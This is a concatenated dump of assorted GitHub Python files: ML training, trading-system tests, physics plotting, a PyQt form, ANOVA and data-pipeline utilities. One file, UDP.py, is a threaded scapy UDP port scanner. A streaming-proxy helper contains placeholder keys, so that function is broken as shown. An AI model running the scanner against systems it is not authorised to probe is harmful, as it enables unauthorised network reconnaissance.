\"feat_value\", \"out\", \"outpre\"])\r\n # 保存图为pb文件\r\n with open(model_path + 'model.pb', 'wb') as f:\r\n f.write(frozen_graph_def.SerializeToString())\r\n batch_x_epochs = batch_x_epochs + 1\r\n\r\n except tf.errors.OutOfRangeError: # num_epochs 次数用完会抛出此异常\r\n print(\"---Train end---\", batch_x_epochs, end_loss)\r\n tf.train.Saver().save(sess, save_path=model_path)\r\n finally:\r\n # 协调器coord发出所有线程终止信号\r\n coord.request_stop()\r\n print('---Programm end---')\r\n coord.join(threads) # 把开启的线程加入主线程,等待threads结束\r\n\r\n\r\n\r\n\r\n","repo_name":"shuDaoNan9/Competitions","sub_path":"tlDFMtest.py","file_name":"tlDFMtest.py","file_ext":"py","file_size_in_byte":14946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22498276715","text":"import logging\nfrom pathlib import Path\n\nfrom custom import basic_custom_actions as bca\nfrom custom.basic_custom_actions import timestamps\nfrom test_framework.core.test_case import TestCase\nfrom test_framework.core.try_exept_decorator import try_except\nfrom test_framework.data_sets.message_types import ORSMessageType\nfrom test_framework.java_api_wrappers.JavaApiManager import JavaApiManager\nfrom test_framework.java_api_wrappers.java_api_constants import JavaApiFields, OrdTypes, OrderReplyConst\nfrom test_framework.java_api_wrappers.oms.es_messages.NewOrderReplyOMS import NewOrderReplyOMS\nfrom test_framework.java_api_wrappers.oms.es_messages.OrdReportOMS import OrdReportOMS\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nseconds, nanos = timestamps() # Test case start time\n\n\nclass QAP_T10475(TestCase):\n @try_except(test_id=Path(__file__).name[:-3])\n def __init__(self, report_id, session_id, data_set, environment):\n super().__init__(report_id, session_id, data_set, environment)\n self.test_id = bca.create_event(Path(__file__).name[:-3], self.report_id)\n self.java_api_connectivity = self.java_api = self.environment.get_list_java_api_environment()[0].java_api_conn\n self.java_api_manager = JavaApiManager(self.java_api_connectivity, self.test_id)\n self.venue_client_name = self.data_set.get_venue_client_names_by_name('client_1_venue_1')\n self.new_order_reply = NewOrderReplyOMS(self.data_set).set_unsolicited_dma_limit()\n self.order_report = OrdReportOMS(self.data_set)\n # endregion\n\n @try_except(test_id=Path(__file__).name[:-3])\n def run_pre_conditions_and_steps(self):\n # region step 1: Create Unsolicited order\n last_venue_ord_id = self.new_order_reply.get_parameters()[JavaApiFields.NewOrderReplyBlock.value][JavaApiFields.LastVenueOrdID.value]\n self.new_order_reply.update_fields_in_component(JavaApiFields.NewOrderReplyBlock.value,\n {\n JavaApiFields.OrdType.value: OrdTypes.StopLimit.value,\n })\n self.java_api_manager.send_message_and_receive_response(self.new_order_reply)\n order_reply = self.java_api_manager.get_last_message(ORSMessageType.OrderReply.value).get_parameters()[JavaApiFields.OrdReplyBlock.value]\n self.java_api_manager.compare_values({JavaApiFields.OrdType.value: OrdTypes.StopLimit.value,\n JavaApiFields.TransStatus.value: OrderReplyConst.TransStatus_OPN.value},\n order_reply, 'Verify that order unsolicited has properly values (step 1)')\n order_id = order_reply[JavaApiFields.OrdID.value]\n # endregion\n\n # region step 2: Send OrdReport\n self.order_report.set_default_open(order_id, last_venue_ord_id)\n self.order_report.update_fields_in_component(JavaApiFields.OrdReportBlock.value, {\n JavaApiFields.ExecType.value: OrderReplyConst.ExecType_RES.value\n })\n self.java_api_manager.send_message_and_receive_response(self.order_report)\n order_reply = self.java_api_manager.get_last_message(ORSMessageType.OrderReply.value).get_parameters()[\n JavaApiFields.OrdReplyBlock.value]\n self.java_api_manager.compare_values({JavaApiFields.OrdType.value: OrdTypes.Limit.value,\n JavaApiFields.TransStatus.value: OrderReplyConst.TransStatus_OPN.value},\n order_reply, 'Verify that order unsolicited has properly values (step 2)')\n # endregion\n","repo_name":"YevhenMoroz/th2-script-quod-demo","sub_path":"test_cases/eq/DMA/QAP_T10475.py","file_name":"QAP_T10475.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"43700017434","text":"import numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom matplotlib.transforms import Bbox\nfrom mpl_toolkits.mplot3d import Axes3D\nimport random\nimport csv\nimport heapq\nimport glob\nimport itertools\nimport matplotlib.gridspec as gridspec\nfrom matplotlib.ticker import FormatStrFormatter\nimport matplotlib.ticker as ticker\nimport matplotlib.colors as colors\nfrom scipy import stats\nfrom scipy.special import hyperu\n# from mpmath import sqrt, pi, gamma, hyperu, fac, fac2, exp\nimport mpmath as mp\n\nplt.rc('text', usetex=True)\nplt.rc('text.latex', preamble=r'\\usepackage{amsmath}')\n\n\ndef plot_2d_lpv17(axis, numb_qy, omega_min, omega_max):\n\n marker = itertools.cycle(('1', '2', '3', '4', ',', '+', '.', 'o', '*', '^', 'v', '>', '<', 'X', '_', 'd', '|', 'H'))\n\n for i, name in enumerate([\"V1_V17_0.0001\", \"V1_V17_0.001\", \"V1_V17_0.01\", \"V1_V17_0.1\", \"V1_V17\"]):\n omega = []\n SR = []\n file = f\"fermions_torus_spec_resp_kysym_{name}_n_6_2s_{numb_qy}_ratio_1.000000_qy_0\" \\\n f\".omega_{omega_min}-{omega_max}_eps_0.0001.sr.cut\"\n with open('/home/bart/PycharmProjects/response_functions/FQHETorusSpectralResponse/stripped_files/' + file, 'r') as csvfile:\n plots = csv.reader(csvfile, delimiter=' ')\n for row in plots:\n omega.append(float(row[0])+10)\n SR.append(float(row[1])/1000)\n axis.scatter(omega, SR, s=2, label=f\"${i-4}$\", marker=next(marker))\n\n axis.set_xlabel('$\\omega$')\n axis.xaxis.set_major_formatter(FormatStrFormatter('$%.3g$'))\n axis.set_ylabel('$I/10^3$')\n axis.legend(loc='upper right', handletextpad=0, borderpad=0.4, framealpha=1,\n edgecolor=None, markerscale=3,\n fontsize=10, ncol=1, labelspacing=0, columnspacing=0, title='$\\log \\\\alpha$')\n\n fig.subplots_adjust(top=0.95, bottom=0.1, right=0.95, left=0.11)\n\n\ndef plot_3d_lpv17(axis, numb_qy, omega_min, omega_max):\n\n # omega = []\n # SR = []\n\n for i, name in enumerate([\"V1_V17_0.0001\", \"V1_V17_0.001\", \"V1_V17_0.01\", \"V1_V17_0.1\", \"V1_V17\"]):\n omega = []\n SR = []\n file = f\"fermions_torus_spec_resp_kysym_{name}_n_6_2s_{numb_qy}_ratio_1.000000_qy_0\" \\\n f\".omega_{omega_min}-{omega_max}_eps_0.0001.sr.cut\"\n with open('/home/bart/PycharmProjects/response_functions/FQHETorusSpectralResponse/stripped_files/' + file, 'r') as csvfile:\n plots = csv.reader(csvfile, delimiter=' ')\n for row in plots:\n omega.append(float(row[0])+10)\n SR.append(float(row[1])/1000)\n\n V17 = [-4+i]*10000\n axis.plot(V17, omega, SR, '.', markersize=3, c=f\"C{i}\")\n\n axis.set_xlabel('$\\log \\\\alpha$')\n axis.xaxis.set_major_formatter(FormatStrFormatter('$%.2g$'))\n axis.yaxis.set_major_formatter(FormatStrFormatter('$%.2g$'))\n axis.zaxis.set_major_formatter(FormatStrFormatter('$%.2g$'))\n axis.set_ylabel('$\\\\omega$')\n axis.set_zlabel('$I/10^3$')\n\n axis.set_yticks(np.arange(-0.1, 0.11, 0.1))\n\n # Get rid of colored axes planes\n # First remove fill\n axis.xaxis.pane.fill = False\n axis.yaxis.pane.fill = False\n axis.zaxis.pane.fill = False\n\n # Now set color to white (or whatever is \"invisible\")\n axis.xaxis.pane.set_edgecolor('w')\n axis.yaxis.pane.set_edgecolor('w')\n axis.zaxis.pane.set_edgecolor('w')\n\n # Bonus: To get rid of the grid as well:\n axis.grid(False)\n\n # fig.subplots_adjust(top=1.2, bottom=0, right=1, left=-0.1, hspace=0, wspace=0)\n axis.set_position(Bbox.from_bounds(0.47, 0.01, 0.45, 1.06))\n axis.tick_params(axis='both', which='major', pad=-2)\n axis.xaxis.labelpad = -1\n axis.yaxis.labelpad = -1\n axis.zaxis.labelpad = -4\n\n\nif __name__ == \"__main__\":\n\n fig = plt.figure(figsize=(6, 2.5))\n gs = gridspec.GridSpec(1, 2, hspace=0.4, wspace=0.4)\n\n ax0 = plt.subplot(gs[0])\n plot_2d_lpv17(ax0, 18, omega_min=-100, omega_max=100)\n ax1 = plt.subplot(gs[1], projection='3d')\n plot_3d_lpv17(ax1, 18, omega_min=-100, omega_max=100)\n\n fig.text(0.03, 0.94, \"(a)\", fontsize=12)\n fig.text(0.51, 0.94, \"(b)\", fontsize=12)\n\n #fig.text(0.405, 0.8, \"$V_1$\", fontsize=11)\n #fig.text(0.79, 0.8, \"Coulomb\", fontsize=11)\n\n plt.savefig(\"/home/bart/Documents/papers/SR/lpv17.png\", bbox_inches='tight', dpi=300)\n plt.show()\n","repo_name":"bartandrews/response_functions","sub_path":"manuscript_plots/lpv17.py","file_name":"lpv17.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"7586205073","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('openbeta/', views.openbeta, name='openbeta'),\n # path('admin2/',views.manage, name='manage'),\n path('admin2/',views.login, name='login'),\n path('download/image/', views.download_image, name='download_image', kwargs={'path':''}),\n]\n","repo_name":"alstja98/cloudtype-purry","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"7835522496","text":"import os\nimport re\nimport sys\n\n\ndef lineInLines(line, lines, intialIndex):\n # print(\"checking for \" + line)\n for l in range(intialIndex, len(lines)):\n # print(lines[l])\n if lines[l] == line:\n return True\n return False\n\n\ndef rmDuplicateLines(filename):\n with open(filename, \"r\") as fr:\n lines = fr.readlines()\n uniqueLines = []\n i = 0\n for line in lines:\n i += 1\n if not lineInLines(line, lines, i):\n uniqueLines.append(line)\n else:\n print(line)\n print(\"lets check unique\")\n print(uniqueLines)\n with open(filename, \"w\") as fr:\n fr.writelines(uniqueLines)\n\ndef fileCatalog(fileCatal):\n rmDuplicateLines(fileCatal)\n for line in open(fileCatal, \"r\").readlines():\n rmDuplicateLines(line.rstrip(\"\\n\"))\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n fileCatalog(r\"D:\\Developed\\Automation\\python\\CheckDuplicatesInTheseFiles.opml\")\n else:\n fileCatalog(sys.argv[1])\n","repo_name":"BeautyScraper/pythonUtilities","sub_path":"duplicateLineRem.py","file_name":"duplicateLineRem.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"25554315777","text":"import sys\nfrom PyQt5 import QtWidgets\n\n\ndef window():\n app = QtWidgets.QApplication(sys.argv)\n win = QtWidgets.QWidget()\n\n fbox = QtWidgets.QFormLayout()\n\n # add Name field\n l1 = QtWidgets.QLabel(\"Name\")\n name = QtWidgets.QLineEdit()\n fbox.addRow(l1, name)\n\n # Add 2 line address field\n l2 = QtWidgets.QLabel(\"Address\")\n add1 = QtWidgets.QLineEdit()\n add2 = QtWidgets.QLineEdit()\n vbox = QtWidgets.QVBoxLayout()\n vbox.addWidget(add1)\n vbox.addWidget(add2)\n fbox.addRow(l2, vbox)\n\n # Add gender radio selection\n radio1 = QtWidgets.QRadioButton(\"Male\")\n radio2 = QtWidgets.QRadioButton(\"Female\")\n hbox = QtWidgets.QHBoxLayout()\n hbox.addWidget(radio1)\n hbox.addWidget(radio2)\n # Prevents radio2 from stretching far from radio1 with resize of window\n hbox.addStretch()\n fbox.addRow(QtWidgets.QLabel(\"sex\"), hbox)\n\n # Add Submit and Cancel Buttons\n hbox = QtWidgets.QHBoxLayout()\n hbox.addStretch()\n hbox.addWidget(QtWidgets.QPushButton(\"Submit\"))\n hbox.addWidget(QtWidgets.QPushButton(\"Cancel\"))\n fbox.addRow(hbox)\n\n win.setLayout(fbox)\n win.setWindowTitle(\"PyQt\")\n win.show()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n window()","repo_name":"keitht226/python_learning","sub_path":"pyqt/beginner_tutorials/qform_layout.py","file_name":"qform_layout.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"25638173841","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 11 13:50:03 2019\n\n@author: nathanielastudillo\n\"\"\"\n\n'''\nAn ANOVA script for calculating the F value of a few samples of size n\n'''\nimport numpy as np\n\ndef ANOVA(groups): #pass in a list of lists where each sublist is a group\n #data for groups\n groups = groups\n groupMeans = []\n n = len(groups[0])\n N = 0\n SSB = 0 #sum of squares between\n SSE = 0 #sum of squares error\n k=len(groups)\n #calculate N\n for group in groups:\n N += len(group)\n #compute group means\n for group in groups:\n groupMeans.append(np.mean(group))\n #compute total mean\n totalMean = np.mean(groupMeans)\n # calculate SSB\n for mean in groupMeans:\n SSB += n*((mean - totalMean)**2)\n #calculate SSE\n for group in groups:\n mean = np.mean(group)\n for item in group:\n SSE += (item - mean)**2\n #Calculate F Value \n df1 = k-1\n df2 = N-k\n F = (SSB/df1)/(SSE/df2)\n return(F)\n\n\n \n ","repo_name":"nathanielastudillo/ANOVA","sub_path":"ANOVA.py","file_name":"ANOVA.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"7948155402","text":"Lines = []\nwith open(\"d2-input.txt\", 'r') as f:\n\tfor l in f:\n\t\tLines.append(l)\n\n## Input processing ##\nimport re\nexpr = re.compile(r\"(\\d+)-(\\d+) (.): (.+)\")\nfor i in range(len(Lines)):\n\tLines[i] = expr.match(Lines[i]).groups()\n\n## Part 1 ##\nvalids = 0\nfor i, l in enumerate(Lines):\n\tif l[3].count(l[2]) in range(int(l[0]),int(l[1])+1):\n\t\tvalids += 1\n\nprint(\"## Day 2 - Part 1:\\n\\tValids:\",valids)\ninput()\n\nprint()\n## Part 2 ##\nvalids = 0\nfor i, l in enumerate(Lines):\n\tif (l[3][int(l[0])-1] == l[2]) + (l[3][int(l[1])-1] == l[2]) == 1:\n\t\tvalids += 1\n\nprint(\"## Day 2 - Part 2:\\n\\tValids:\",valids)\ninput()","repo_name":"xcnwf/AdventOfCode2020","sub_path":"day 2/d2-algo.py","file_name":"d2-algo.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"11967752395","text":"#********************************************************************************\n#--------------------------------------------------------------------------------\n#\n#\tSignificance Labs\n#\tBrooklyn, NYC\n#\n# \tAuthor: Alexandra Berke (aberke)\n# \tWritten: Summer 2014\n#\n#\n# \t/language/map.py\n#\n# Contains the actual translation data\n# Translate data comes from a publicly published Google Spreadsheet\n# Initially contains empty map\n#\n# {\n# \tkeyname: {\n# \t\ten: \"english translation\",\n# \t\tes: \"spanish translation\",\n# \t\t... for column/language in spreadsheet\n# \t},\n# \t... for row/keyname in spreadsheet\n# }\n#\n\n# building the map.yaml file\n# grep for keys in the source:\n# `grep -R \\{\\{ '(.*)' \\| translate . | grep -ow '[A-Z_]\\+' | sort | uniq >> keys.txt`\n# and then build dictionary with the key as the en: and es: values.\n# then go through app and replace the en with the appropriate english.\n#\tGoogle documentation for accessing spreadsheet data:\n#\t\thttps://developers.google.com/gdata/samples/spreadsheet_sample\n#\n#\n#--------------------------------------------------------------------------------\n#*********************************************************************************\n\n#import requests\nimport config\nimport os\nimport yaml\nfrom collections import defaultdict\n\n# autovivification:\n# http://en.wikipedia.org/wiki/Autovivification\n# essentially, allows you easily dynamically build dictionaries.\nTree = lambda: defaultdict(Tree)\n# map of translations kept in \"cache\"\nmap = Tree()\n\ndef get_map():\n\tif map:\n\t\treturn map\n\treturn build_map()\n\ndef build_map():\n\t# re-initialize map\n\tmap = Tree()\n\n\t# get pwd\n\tscript_dir = os.path.dirname(__file__)\n\n\t# load all supported languages.\n\tfor lang in config.SUPPORTED_LANGUAGES:\n\t\t# relative to pwd\n\t\trel_path = \"./translations/{0}.yaml\".format(lang)\n\t\t# yaml format:\n\t\t# KEY_NAME: \"value\"\n\n\t\ttranslation_path = os.path.join(script_dir, rel_path)\n\t\tyaml_string = open(translation_path)\n\t\tlang_map = yaml.load(yaml_string)\n\t\tyaml_string.close()\n\t\tfor key,value in lang_map.iteritems():\n\t\t\tmap[key][lang]=value # autovivification in action.\n\n\treturn map\n\nmap = build_map()","repo_name":"aberke/check-list","sub_path":"app/language/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"27850523830","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n 简单端口扫描程序\r\n UDP扫描\r\n\r\n\"\"\"\r\nfrom scapy.all import *\r\nfrom scapy.layers.inet import IP, UDP \r\nimport threading\r\n\r\ntarget=\"127.0.0.1\"\r\na=int(input(\"请输入扫描起始端口:\"))\r\nb=int(input(\"请输入扫描终止端口:\"))\r\nportslist=(list(range(a,b)))\r\n'''\r\nportslist=[21, 22, 34, 135, 139, 80, 445]\r\n'''\r\ndef UDP_scan(target,port):\r\n pkt=IP(dst=target)/UDP(dport=int(port))\r\n res=sr1(pkt,timeout=0.1,verbose=0)\r\n if res==None:\r\n print(f\"[+] Port {str(port)} Is Open\\n\")\r\n\r\ndef udp_scanner(target,portslist):\r\n print(f\"Scanning {target} for Open UDP Ports\\n\")\r\n for port in portslist:\r\n t=threading.Thread(target=UDP_scan,args=(target,port))\r\n t.start()\r\n\r\nif __name__=='__main__':\r\n udp_scanner(target,portslist)\r\n","repo_name":"OREOo-o/Port-Scanner","sub_path":"UDP.py","file_name":"UDP.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"11465201367","text":"#!/usr/bin python3\r\n# -*- coding: utf-8 -*-\r\nimport hashlib\r\nfrom urllib.parse import *\r\nimport aiohttp\r\nimport asyncio\r\nfrom loguru import *\r\nfrom app.plugins.proxy.tools import *\r\nfrom app.conf.config import *\r\n\r\n\r\nasync def get4gtvurl(fsid):\r\n _a = now_time()\r\n url = urljoin(data3['a3'], \"?type=v5\".format(fsid))\r\n data = {\"t\": _a - tx, \"fid\": fsid, \"v\": config.VERSION}\r\n header = {\r\n \"Accept\": \"*/*\",\r\n \"User-Agent\": machine,\r\n \"Accept-Language\": \"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\",\r\n \"v\": hashlib.md5(bytes(str(data) + mdata, 'utf8')).hexdigest(),\r\n }\r\n async with aiohttp.ClientSession() as session:\r\n async with session.post(url=url, data=data, headers=header) as res:\r\n logger.success(f\"{fsid} {res.status}\")\r\n try:\r\n _ = await res.json()\r\n return res.status, data[\"xx\"], data['xxxxx'], _a, \"xxxx\"\r\n except:\r\n return res.status, None, res.xxx, _a, \"\"\r\n\r\n\r\n","repo_name":"239144498/ProxyURL","sub_path":"app/plugins/proxy/endecrypt.py","file_name":"endecrypt.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"63"} +{"seq_id":"2798529780","text":"\"\"\"\nAn example desmontrating a publish-subscribe usage of stompclient.\n\nIn this example it is necessary to start a thread listener loop to receive the\nframes from the server. When the listener loop is running other \"response\" \nframes, such as the CONNECTED frame, will also be returned by the \nPublishSubscribeClient.\n\"\"\"\nimport threading\nimport logging\nimport time\nimport pickle\n\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\nfrom stompclient import PublishSubscribeClient\n\ndef frame_received(frame):\n # Do something with the frame!\n payload = pickle.loads(frame.body)\n logger.info(\"Received data: {0!r}\".format(payload))\n\nclient = PublishSubscribeClient('127.0.0.1', 61613)\nlistener = threading.Thread(target=client.listen_forever, name='Frame-Receiver')\nlistener.start()\n\n# For our example, we want to wait until the server is actually listening\nclient.listening_event.wait()\n\ntry:\n result = client.connect()\n logger.info(\"Got session response from connect: {0}\".format(result.session))\n client.subscribe(\"/queue/example\", frame_received)\n \n while True:\n time.sleep(1.0)\n \nfinally:\n client.shutdown_event.set()\n listener.join()","repo_name":"hozn/stompclient","sub_path":"examples/subscriber_thread.py","file_name":"subscriber_thread.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"34207080067","text":"#!/usr/bin/env python\n\"\"\"recipy - a frictionless provenance tool for Python\n\nUsage:\n recipy search [options] \n recipy latest [options]\n recipy gui [options]\n recipy (-h | --help)\n recipy --version\n\nOptions:\n -h --help Show this screen\n --version Show version\n -a --all Show all results (otherwise just latest result given)\n -f --fuzzy Use fuzzy searching on filename\n -r --regex Use regex searching on filename\n -i --id Search based on (a fragment of) the run ID\n -v --verbose Be verbose\n -d --diff Show diff\n --debug Turn on debugging mode\n\n\"\"\"\nimport os\nimport re\nimport sys\n\nfrom docopt import docopt\nfrom pprint import pprint\nfrom jinja2 import Template\nfrom tinydb import TinyDB, where\nfrom dateutil.parser import parse\nimport six\n\nfrom . import __version__\nfrom recipyCommon import config, utils\n\n\ndb = utils.open_or_create_db()\n\n\ndef print_result(r):\n # Print a single result from the search\n template = \"\"\"Run ID: {{ unique_id }}\nCreated by {{ author }} on {{ date }} UTC\nRan {{ script }} using {{ command }}\n{% if command_args|length > 0 %}\nUsing command-line arguments: {{ command_args }}\n{% endif %}\n{% if gitcommit is defined %}\nGit: commit {{ gitcommit }}, in repo {{ gitrepo }}, with origin {{ gitorigin }}\n{% endif %}\nEnvironment: {{ environment|join(\", \") }}\n{% if exception is defined %}\nException: ({{ exception.type }}) {{ exception.message }}\n{% endif %}\n{% if inputs|length == 0 %}\nInputs: none\n{% else %}\nInputs:\n{% for input in inputs %}\n {{ input }}\n{% endfor %}\n{% endif %}\n{% if outputs | length == 0 %}\nOutputs: none\n{% else %}\nOutputs:\n{% for output in outputs %}\n {{ output }}\n{% endfor %}\n{% endif %}\"\"\"\n template = Template(template, trim_blocks=True)\n print(template.render(**r))\n\n\ndef main():\n \"\"\"\n Main function for recipy command-line script\n \"\"\"\n args = docopt(__doc__, version='recipy v%s' % __version__)\n\n if args['--debug']:\n print('Command-line arguments: ')\n print(args)\n print('DB path: ', config.get_db_path())\n print('')\n print('Full config file (as interpreted):')\n print('----------------------------------')\n conf = config.read_config_file()\n s = six.StringIO()\n conf.write(s)\n print(s.getvalue())\n print('----------------------------------')\n\n\n if args['search']:\n search(args)\n elif args['latest']:\n latest(args)\n elif args['gui']:\n gui(args)\n\ndef gui(args):\n \"\"\"\n Loads recipy GUI from the command-line\n \"\"\"\n from recipyGui import recipyGui\n import threading, webbrowser, socket\n\n def get_free_port():\n s = socket.socket()\n s.bind(('', 0))\n port = s.getsockname()[1]\n s.close()\n return port\n\n port = get_free_port()\n url = \"http://127.0.0.1:{0}\".format(port)\n\n # Give the application some time before it starts\n threading.Timer(1.25, lambda: webbrowser.open(url) ).start()\n\n # Turn off reloading by setting debug = False (this also fixes starting the\n # application twice)\n recipyGui.run(debug = args['--debug'], port=port)\n\ndef latest(args):\n results = db.all()\n\n results = [_change_date(result) for result in results]\n\n # Sort the results\n results = sorted(results, key = lambda x: parse(x['date']))\n\n print_result(results[-1])\n\n if args['--diff']:\n if 'diff' in results[-1]:\n print(\"\\n\\n\")\n print(results[-1]['diff'])\n\n db.close()\n\ndef search(args):\n filename = args['']\n\n if args['--fuzzy']:\n results = db.search(where('outputs').any(lambda x: re.match(\".+%s.+\" % filename, x)))\n elif args['--regex']:\n results = db.search(where('outputs').any(lambda x: re.match(filename, x)))\n elif args['--id']:\n results = db.search(where('unique_id').matches('%s.+' % filename))\n # Automatically turn on display of all results so we don't misleadingly\n # suggest that their shortened ID is unique when it isn't\n args['--all'] = True\n else:\n results = db.search(where('outputs').any(os.path.abspath(filename)))\n\n results = [_change_date(result) for result in results]\n\n # Sort the results\n results = sorted(results, key = lambda x: parse(x['date']))\n\n if len(results) == 0:\n print(\"No results found\")\n else:\n if args['--all']:\n for r in results[:-1]:\n print_result(r)\n print(\"-\"*40)\n print_result(results[-1])\n else:\n print_result(results[-1])\n if len(results) > 1:\n print(\"** Previous runs creating this output have been found. Run with --all to show. **\")\n\n if args['--diff']:\n if 'diff' in results[-1]:\n print(\"\\n\\n\")\n print(results[-1]['diff'])\n\n db.close()\n\ndef _change_date(result):\n result['date'] = result['date'].replace('{TinyDate}:', '')\n return result\n\nif __name__ == '__main__':\n main()\n","repo_name":"musically-ut/recipy","sub_path":"recipyCmd/recipycmd.py","file_name":"recipycmd.py","file_ext":"py","file_size_in_byte":4827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"63"} +{"seq_id":"4133267350","text":"class Solution:\n def kthSmallest(self, matrix: List[List[int]], k: int) -> int:\n # kth smallest\n # n X n matrix\n # negate the numbers\n # heappop the numbers if greater than k\n # return the last element negated\n \n heap = []\n \n for nums in matrix:\n for num in nums:\n heappush(heap, num*-1)\n \n while len(heap) > k:\n heappop(heap)\n\n\n return heap[0] * -1\n \n ","repo_name":"NathanZlion/Competitive-Programming","sub_path":"0378-kth-smallest-element-in-a-sorted-matrix/0378-kth-smallest-element-in-a-sorted-matrix.py","file_name":"0378-kth-smallest-element-in-a-sorted-matrix.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"63"} +{"seq_id":"35116574448","text":"import argparse\nimport datetime\nimport os\nimport shutil\nimport subprocess\nimport tempfile\nimport time\nfrom pathlib import Path\nfrom typing import Callable, Dict, List, Optional, Union\nimport attr\nfrom collections import OrderedDict\n\nfrom loguru import logger\n\nimport hail as hl\n\nfrom data_pipeline.config import PipelineConfig\n\n\nclass GoogleCloudStorageFileSystem:\n def exists(self, path): # pylint: disable=no-self-use\n return hl.hadoop_exists(path)\n\n def modified_time(self, path): # pylint: disable=no-self-use\n # The Hail docs say that stat[\"modification_time\"] should be a string,\n # but in the case of Google Cloud Storage, it returns an epoch timestamp\n # as an int. There is a Google Cloud Storage filesystem in the Hail\n # backend, but no Python bindings for it as of yet; when those bindings\n # exist, we should probably use that filesystem here instead of a\n # generic Hadoop FS.\n stat = hl.hadoop_stat(path)\n return stat[\"modification_time\"]\n\n\nclass LocalFileSystem:\n def exists(self, path): # pylint: disable=no-self-use\n return os.path.isfile(path)\n\n def modified_time(self, path): # pylint: disable=no-self-use\n stat_result = os.stat(path)\n return datetime.datetime.fromtimestamp(stat_result.st_mtime)\n\n\ndef file_exists(path):\n file_system = GoogleCloudStorageFileSystem() if path.startswith(\"gs://\") else LocalFileSystem()\n check_path = path + \"/_SUCCESS\" if path.endswith(\".ht\") else path\n return file_system.exists(check_path)\n\n\ndef modified_time(path):\n file_system = GoogleCloudStorageFileSystem() if path.startswith(\"gs://\") else LocalFileSystem()\n check_path = path + \"/_SUCCESS\" if path.endswith(\".ht\") else path\n return file_system.modified_time(check_path)\n\n\n_pipeline_config = {}\n\n\n@attr.define\nclass DownloadTask:\n _config: Optional[PipelineConfig]\n _name: str\n _url: str\n _output_path: str\n\n @classmethod\n def create(cls, config: Optional[PipelineConfig], name: str, url: str, output_path: str):\n return cls(config, name, url, output_path)\n\n def get_output_path(self):\n if self._config:\n return self._config.output_root + self._output_path\n else:\n return _pipeline_config[\"output_root\"] + self._output_path\n\n def should_run(self):\n output_path = self.get_output_path()\n if not file_exists(output_path):\n return (True, \"Output does not exist\")\n\n return (False, None)\n\n def get_inputs(self):\n raise NotImplementedError(\"Method not valid for DownloadTask\")\n\n def run(self, force=False):\n output_path = self.get_output_path()\n should_run, reason = (True, \"Forced\") if force else self.should_run()\n if should_run:\n logger.info(f\"Running {self._name} ({reason}\")\n\n start = time.perf_counter()\n with tempfile.NamedTemporaryFile() as tmp:\n subprocess.check_call([\"curl\", \"-o\", tmp.name, self._url])\n\n if output_path.startswith(\"gs://\"):\n subprocess.check_call([\"gsutil\", \"cp\", tmp.name, output_path])\n else:\n shutil.copyfile(tmp.name, output_path)\n\n stop = time.perf_counter()\n elapsed = stop - start\n logger.info(\"Finished %s in %dm%02ds\", self._name, elapsed // 60, elapsed % 60)\n else:\n logger.info(\"Skipping %s\", self._name)\n\n\n@attr.define\nclass Task:\n _name: str\n _task_function: Callable\n _output_path: str\n _inputs: dict\n _params: dict\n _config: Optional[PipelineConfig] = None\n\n @classmethod\n def create(\n cls,\n config: Optional[PipelineConfig],\n name: str,\n task_function: Callable,\n output_path: str,\n inputs: Optional[dict] = None,\n params: Optional[dict] = None,\n ):\n if inputs is None:\n inputs = {}\n if params is None:\n params = {}\n return cls(name, task_function, output_path, inputs, params, config)\n\n def get_output_path(self):\n if self._config:\n return os.path.join(self._config.output_root, self._output_path)\n else:\n return _pipeline_config[\"output_root\"] + self._output_path\n\n def get_inputs(self):\n paths = {}\n\n for k, v in self._inputs.items():\n if isinstance(v, (Task, DownloadTask)):\n paths.update({k: v.get_output_path()})\n else:\n if self._config:\n if self._config.input_root:\n paths.update({k: os.path.join(self._config.input_root, v)})\n if \"gs://\" in v:\n paths.update({k: v})\n else:\n paths.update({k: v})\n else:\n paths.update({k: v})\n\n return paths\n\n def should_run(self):\n output_path = self.get_output_path()\n if not file_exists(output_path):\n return (True, \"Output does not 